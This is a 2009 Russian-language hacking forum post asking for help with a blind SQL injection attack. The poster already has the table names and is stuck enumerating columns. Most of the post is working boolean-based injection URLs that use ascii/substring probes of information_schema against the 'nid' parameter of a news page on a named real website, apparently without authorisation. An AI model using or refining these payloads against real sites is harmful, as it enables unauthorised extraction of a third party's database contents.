31.05.2009, 13:58
|
|
Познающий
Регистрация: 19.04.2008
Сообщений: 67
Провел на форуме:
596695
Репутация:
19
|
|
blind sql inj
Сообщение от R1dex
Неужели в гугле не найти?
Тот же sipt4..
Нету в сипте 4 посимвольного брута....
Еще вопрос по blind...
Код:
http://www.aftech.ru/about/news/?nid=10+and+ascii(substring((select+table_name+from+information_schema.tables+limit+1,1),1,1))>=1--
Код:
http://www.aftech.ru/about/news/?nid=10+and+ascii(substring((select+table_name+from+information_schema.tables+limit+1,1),1,1))>=200--
Видно что вывод разный, написал кое-как кривой скрипт, сдампил таблицы...
терь вопрос почему
Код:
http://www.aftech.ru/about/news/?nid=10+and+ascii(substring((select+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x276E65777327),1,1))>=1--
и
Код:
http://www.aftech.ru/about/news/?nid=10+and+ascii(substring((select+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x276E65777327),1,1))>=200--
Возвращают одинаковые результаты...
таблица 0x276E65777327=news точно есть, т к
Код:
http://www.aftech.ru/about/news/?nid=10+and+ascii(substring((select+*+FROM+news),1,1))>=1--
|
|
|